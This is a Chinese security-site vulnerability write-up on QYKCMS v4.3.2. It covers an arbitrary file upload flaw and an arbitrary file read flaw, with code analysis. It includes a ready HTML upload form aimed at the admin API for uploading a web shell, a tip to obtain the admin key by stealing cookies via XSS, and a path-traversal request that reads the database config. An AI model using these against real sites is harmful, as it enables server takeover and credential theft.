ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → QYKCMS(青云客)后台任意文件上传 任意文件读取漏洞

QYKCMS(青云客)后台任意文件上传 任意文件读取漏洞

时间:2018-03-31 16:58:31人气:作者:本站作者我要评论

青云客网站管理系统(QYKCMS)是青云客开发的一款基于PHP+MySql的轻量级智能建站系统。在T00ls看到两篇QYKCMS的代码审计文章,也下载了一套回来测试,发现了两个后台漏洞,并没有跟前面的漏洞重复,分享一下思路。

QYKCMS官网:http://www.qykcms.com/

网站源码版本:QYKCMS_v4.3.2(企业站主题)

程序源码下载:http://bbs.qingyunke.com/thread-13.htm

任意文件上传

代码分析:

1、漏洞文件位置:/admin_system/include/lib/upfile.php   第24-69行:

这段代码根据types的值进行操作,可以发现当$types=none的时候(注意看红色代码部分),获取文件名后缀,拼接成完整路径,然后将文件上传到服务器。

并没有对文件类型进行过滤,导致程序在实现上存在任意文件上传漏洞,攻击者可以通过上传脚本木马,控制服务器权限。

漏洞利用:

1、构造Form表单,key可通过XSS获取管理员COOKIE得到:

<form enctype="multipart/form-data" action="http://127.0.0.1/admin_system/api.php?admin=admin&key=15bc30cb5bfc1775c4733c9558fded91&log=upfile&types=none" method="post">  

 Upload a new file:<br>  

<input type="file" name="file" size="50"><br>  

<input type="submit" value="Upload">  

 </form>

2、成功上传脚本木马,并回显上传路径

QYKCMS(青云客)后台任意文件上传 任意文件读取漏洞

3、去掉文件名称的第一个“|”符,然后访问脚本木马地址

任意文件读取

代码分析:

1、漏洞文件位置:/admin_system/include/show/template.php  第1-22行:

这段代码中接收path参数,然后进行转码处理,注意看红色代码部分,接着判断是否是一个目录,然后带入file_get_contents函数中执行,可以看到path参数并未进行任何过滤或处理,导致程序在实现上存在任意文件读取漏洞,可以读取网站任意文件,攻击者可利用该漏洞获取敏感信息。

漏洞利用:

QYKCMS默认数据库配置文件存放在\include\config_db.php中,我们构造一个路径去读取数据库敏感信息,成功读取配置文件信息。

http://127.0.0.1/admin_system/api.php  

POST: admin=admin&key=682b82f8dc3b753d6eb9ceafd5a64301&log=show&desc=template&path=../include/config_db.php

相关文章

猜你喜欢

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网